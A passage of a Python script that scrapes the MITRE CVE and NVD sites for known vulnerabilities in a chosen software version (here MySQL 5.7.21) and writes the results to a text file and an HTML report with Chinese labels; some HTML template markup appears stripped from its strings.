威胁评分 19 | cve_cna = '' # 漏洞分配的机构 20 | 21 | def show(self): 22 | """ 23 | Show basic vul information 24 | :return: None 25 | """ 26 | print('----------------------------------') 27 | print('编号:', self.cve_no) 28 | print('漏洞地址:', self.cve_url) 29 | print('漏洞描述:', self.cve_description[:10]) 30 | print('创建时间:', self.cve_create_time) 31 | print('修改时间:', self.cve_modify_time) 32 | print('CNA:', self.cve_cna) 33 | print('漏洞等级:', self.cve_level) 34 | print('漏洞评分:', self.cve_score) 35 | print('\n\n') 36 | 37 | 38 | # cve search url 39 | search_url = 'https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=' 40 | 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' 43 | } 44 | 45 | # 漏洞等级对应 46 | level_dict = { 47 | 'CRITICAL': '严重', 48 | 'HIGH': '高', 49 | 'MEDIUM': '中', 50 | 'LOW': '低' 51 | } 52 | 53 | cve_obj_list = [] # cve obj-s fill with detailed information 54 | cve_all = [] # cve no-s fetched from nvd 55 | 56 | # for query information, need to provide : producer、software、banner 57 | producer = 'oracle' 58 | software = 'mysql' 59 | banner = '5.7.21' 60 | 61 | 62 | def fill_with_cve(cve, cve_obj): 63 | """ 64 | Fetch detailed information by search cve to fill cve_obj that can be fetch from CVE 65 | :param cve: cve no 66 | :param cve_obj: cve object to fill 67 | :return: None 68 | """ 69 | 70 | # construct cve url 71 | cve_url = 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=' 72 | url = '{}{}'.format(cve_url, cve) 73 | # print(url) 74 | 75 | # fill cve obj with cve_no & cve_url 76 | cve_obj.cve_no = cve 77 | cve_obj.cve_url = url 78 | # print(cve_obj.cve_url) 79 | 80 | try: 81 | response = requests.get(url=url, timeout=15, headers=headers) 82 | soup = BeautifulSoup(response.text, features="lxml") 83 | 84 | # to get cve description or detail information 85 | result = soup.select('body > div#Page > div#CenterPane > div#GeneratedTable > table > tr') 86 | description = result[3].td.string 87 | cve_obj.cve_description = description 88 | 89 | # to get cve create time 90 | result = soup.select('body > div#Page > div#CenterPane > div#GeneratedTable > table > tr > td > b') 91 | time = result[1].string 92 | time = '{}-{}-{}'.format(time[:4], time[4:6], time[6:]) 93 | # print('time...', time) 94 | 95 | # to get assgining cna 96 | result = soup.select('body > div#Page > div#CenterPane > div#GeneratedTable > table > tr') 97 | cna = result[8].td.string 98 | 99 | cve_obj.cve_create_time = time 100 | cve_obj.cve_cna = cna 101 | except: 102 | print('something bad happen when searching cve...') 103 | finally: 104 | pass 105 | 106 | 107 | def fill_with_nvd(cve, cve_obj): 108 | """ 109 | Fetch detailed information by search cve to fill cve_obj that can be fetch from NVD 110 | :param cve: cve no 111 | :param cve_obj: cve object to fill 112 | :return: None 113 | """ 114 | nvd_url = 'https://nvd.nist.gov/vuln/detail/' 115 | url = '{}{}'.format(nvd_url, cve) 116 | cve_obj.cve_nvd_url = url 117 | # print(cve_obj.cve_nvd_url) 118 | 119 | try: 120 | response = requests.get(url, headers=headers, timeout=60) 121 | if response.status_code == 200: 122 | 123 | # to get modified time 124 | time = re.findall('"vuln-description-last-modified">(.*)?', response.text)[0] 125 | month, day, year = time.split('/') 126 | time = '{}-{}-{}'.format(year, month, day) 127 | # print(time) 128 | cve_obj.cve_modify_time = time 129 | 130 | # to get vul score 131 | score = re.findall('"vuln-cvssv3-base-score">(.*)? ', response.text) 132 | if score.__len__() == 0: 133 | score = re.findall('"vuln-cvssv2-base-score">(.*)? ', response.text) 134 | # print(score[0]) 135 | cve_obj.cve_score = score[0] 136 | 137 | # to get vul level 138 | severity = re.findall('"vuln-cvssv3-base-score-severity">(.*)?', response.text) 139 | if severity.__len__() == 0: 140 | severity = re.findall('"vuln-cvssv2-base-score-severity">(.*)?', response.text) 141 | # print(severity[0]) 142 | cve_obj.cve_level = level_dict[severity[0]] 143 | except: 144 | print('something bad happen when searching nvd...') 145 | finally: 146 | pass 147 | pass 148 | 149 | 150 | def fetch_all_cves(): 151 | """ 152 | Query NVD to get specific version of software vulnerabilities 153 | :return: None 154 | """ 155 | # contruct query string 156 | if banner: 157 | keyword = '{}%3a{}'.format(software, banner) 158 | else: 159 | keyword = software 160 | url = 'https://nvd.nist.gov/vuln/search/results?form_type=Advanced&' \ 161 | 'cves=on&cpe_version=cpe%3a%2fa%3a{}%3a{}'.format(producer, keyword) 162 | print(url) 163 | 164 | # to get cve number 165 | try: 166 | response = requests.get(url, timeout=60, headers=headers) 167 | if response.status_code == 200: 168 | num = re.findall('"vuln-matching-records-count">(.*)?', response.text)[0] 169 | msg = 'There are {} cves with {} {}...'.format(num, software, banner) 170 | print(msg) 171 | except: 172 | pass 173 | 174 | # fetch all cve no 175 | start_index = index = 0 176 | while start_index < int(num): 177 | url = 'https://nvd.nist.gov/vuln/search/results?form_type=Advanced&' \ 178 | 'cves=on&cpe_version=cpe%3a%2fa%3a{}%3a{}&' \ 179 | 'startIndex={}'.format(producer, keyword, start_index) 180 | msg = 'processing page {}/{}...'.format(index+1, math.ceil(int(num) / 20)) 181 | print(msg) 182 | index += 1 183 | start_index = index * 20 184 | try: 185 | response = requests.get(url, timeout=60, headers=headers) 186 | if response.status_code == 200: 187 | cves = re.findall('"vuln-detail-link-\d+">(.*)?', response.text) 188 | cve_all.extend(cves) 189 | except: 190 | pass 191 | print('\n-------- CVEs ---------\n') 192 | for line in cve_all: 193 | print(line) 194 | print() 195 | 196 | 197 | def fetch_vul_info(): 198 | 199 | # get all cves 200 | fetch_all_cves() 201 | 202 | i = 0 203 | for cve in cve_all: 204 | i += 1 205 | cve_obj = CveObject() 206 | 207 | # if i == 4: 208 | # break 209 | msg = '[{}/{}] Fetching {} ...'.format(i, cve_all.__len__(), cve) 210 | print(msg) 211 | # fill cve object with information from cve and nvd 212 | fill_with_cve(cve, cve_obj) 213 | fill_with_nvd(cve, cve_obj) 214 | cve_obj_list.append(cve_obj) 215 | pass 216 | 217 | 218 | def save_cve_objs(): 219 | """ 220 | Save cve info to a file 221 | :return: None 222 | """ 223 | for obj in cve_obj_list: 224 | cve_info = '{}|{}|{}|{}|{}|{}|{}|{}|{}\n'.format(obj.cve_no, obj.cve_url, obj.cve_nvd_url, 225 | obj.cve_score, obj.cve_level, obj.cve_cna, 226 | obj.cve_create_time, obj.cve_modify_time, obj.cve_description) 227 | with open('cve.txt', 'a+') as fw: 228 | fw.write(cve_info) 229 | 230 | 231 | def write2html(): 232 | """ 233 | Write cve into to create a html file, this function is terriblely implemented, (^_^) 234 | :param keyword: software name 235 | :return: None 236 | """ 237 | print('write data to html') 238 | html = '' 239 | header = '\ 240 | \ 241 | \ 242 | CVEs\ 243 | \ 244 | \ 245 | \ 246 | \ 247 |
\ 248 |

CVEs for {} {}

\ 249 |
\ 250 |
' 251 | 252 | header = header.format(software, banner) 253 | 254 | body = '
\ 255 |
\ 256 |

漏洞列表

\ 257 |
' 258 | 259 | vul_list = '' 260 | for obj in cve_obj_list: 261 | vul = '{}    {}
' 262 | vul = vul.format(obj.cve_no, obj.cve_no, obj.cve_level) 263 | vul_list = '{}{}'.format(vul_list, vul) 264 | 265 | vul_left = '
\ 266 |
\ 267 |
\ 268 |
' 269 | 270 | body = '{}{}{}'.format(body, vul_list, vul_left) 271 | 272 | table = '
\ 273 | \ 274 | \ 275 | \ 276 | \ 277 | \ 278 | \ 279 | \ 280 | \ 281 | \ 282 | \ 283 | \ 284 | \ 285 | \ 286 | \ 287 | \ 288 |
等级严重高危中危低危
个数({}){}{}{}{}
\ 289 |
' 290 | 291 | a = b = c = d = e = 0 292 | for cve in cve_obj_list: 293 | if cve.cve_level == '严重': 294 | a += 1 295 | elif cve.cve_level == '高': 296 | b += 1 297 | elif cve.cve_level == '中': 298 | c += 1 299 | elif cve.cve_level == '低': 300 | d += 1 301 | else: 302 | e += 1 303 | 304 | table = table.format(cve_obj_list.__len__(), a, b, c, d) 305 | 306 | body = '{}{}'.format(body, table) 307 | 308 | for obj in cve_obj_list: 309 | cve_body = '\ 310 |
\ 311 | \ 312 | \ 313 | \ 314 | \ 315 | \ 316 | \ 317 | \ 318 | \ 319 | \ 320 | \ 321 | \ 322 | \ 323 | \ 324 | \ 325 | \ 326 | \ 327 |
漏洞编号{}
威胁评分{}
风险等级{}
发现时间{}
修改时间{}
\ 328 |

Assigning CNA

\ 329 | \ 333 |

漏洞描述

\ 334 | \ 338 |

参考链接

\ 339 | \ 343 |
' 344 | 345 | cve_body = cve_body.format(obj.cve_no, obj.cve_no, obj.cve_score, obj.cve_level, 346 | obj.cve_create_time, obj.cve_modify_time, obj.cve_cna, obj.cve_description, 347 | obj.cve_url, obj.cve_nvd_url) 348 | 349 | body = '{}{}'.format(body, cve_body) 350 | 351 | footer = '
\ 352 |
\ 353 | \ 366 | \ 367 | ' 368 | html = '{}{}{}'.format(header, body, footer) 369 | 370 | # write to cve html file for showing results 371 | with open('cve.html', 'w', encoding='utf-8') as fw: 372 | fw.write(html) 373 | 374 | 375 | if __name__ == '__main__': 376 | # use '+' to connect keyword, eg. mysql+5.7.21 377 | fetch_vul_info() 378 | for obj in cve_obj_list: 379 | obj.show() 380 | write2html() 381 | save_cve_objs() 382 | pass 383 | --------------------------------------------------------------------------------